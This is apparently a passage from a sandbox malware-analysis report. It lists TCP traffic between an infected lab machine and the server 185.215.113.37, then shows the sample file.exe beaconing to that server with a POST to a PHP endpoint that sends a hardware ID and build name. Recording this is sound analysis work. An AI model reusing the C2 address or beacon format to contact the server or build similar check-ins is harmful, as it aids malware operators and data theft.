Sep 28, 2024 07:32:14.170185089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170222998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170227051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170273066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170279980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170298100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170311928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170322895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170327902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170339108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170344114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170356989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170360088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170367956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170387983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170389891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170406103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170407057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170422077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170430899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170434952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170447111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170460939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170479059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170504093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170514107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170548916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170641899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170653105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170661926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170671940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170681953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170691013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170691967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170705080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170706987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170715094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170727015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170730114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170743942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170749903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170756102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170774937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170802116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171094894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171104908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171116114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171125889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171137094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171145916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171147108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171169043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171180964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171334028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171344995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171355009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171365023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171375036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171387911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171391964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171401978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171406031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171413898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171423912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171427011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171437025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171449900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171475887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171611071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171653986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171829939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171842098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171850920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171859026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171869993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171879053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171889067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171892881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171900034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171907902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171911001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171921968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171931982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171931982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171943903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171953917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171963930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171971083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171971083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171972990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171983957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.171989918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.171993971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172005892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172013998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172018051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172024012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172064066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172601938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172612906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172622919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172631979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172641993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172652006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172652960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172662973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172669888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172681093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172691107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172693014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172698975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172709942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172713995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172719955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172730923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172738075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172741890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172753096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172761917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172765017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172774076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172781944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172785997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.172806978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.172836065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.173302889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173312902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173321962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173331022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173341036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173348904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.173352003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173362970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173377037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173379898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.173387051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.173388958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.173444986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.173444986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.202213049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.207293987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425101042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425117970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425133944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425144911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425156116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425167084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425178051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425198078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425247908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425251007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425262928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425276995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425287962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425290108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425297022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425318956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425342083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425401926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425411940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425421953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425431967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425441980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425443888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425451994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425465107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425476074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425498962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425638914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425649881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425661087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425672054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425678015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425684929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425694942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425697088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425724030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425734997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425864935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425873041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425883055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425894976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425904036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425906897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425915003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.425915956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425945997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.425956964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426162004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426176071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426187038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426197052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426204920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426208019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426218987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426227093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426228046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426239967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426249027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426254988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426260948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426270008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426270008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426278114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426290989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426316977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426486969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426496983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426507950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426518917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426532984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426553011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426625967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426667929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426728964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426739931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426748991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426758051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426767111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426772118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426784039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426795006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426800013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426805019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426815033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426815987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426830053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426840067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426850080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426856041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426866055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426872969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426879883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426887989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.426889896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426942110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.426942110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427330971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427341938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427351952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427361012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427371979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427381992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427401066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427401066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427414894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427592039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427603006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427612066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427620888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427635908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427637100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427648067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427654028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427660942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427671909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427680969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427685022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427695990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427696943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.427722931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.427747965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.512691975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.512767076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:15.094434977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:15.094434977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:15.099380970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:15.099433899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:15.986721992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:15.986788988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.052898884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.058020115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.463615894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.463634014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.463644028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.463654041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.463675022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.463704109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.465755939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.470525980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.690423965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:16.690545082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.707221031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:16.712120056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.634675980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.634816885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:17.661971092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:17.666878939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.895179987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.895205021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.895215988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:17.895248890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:17.895283937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:17.896637917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:17.901433945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:18.626184940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:18.626483917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:23.630060911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:23.634145021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:24.832421064 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	6936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 07:32:01.712605953 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 07:32:02.419660091 CEST	203	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:02.422169924 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDB Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 44 38 31 31 32 43 34 42 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="hwid"AED8112C4B933158821099------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build"save------AEGHJKJKKJDHIDHJKJDB--
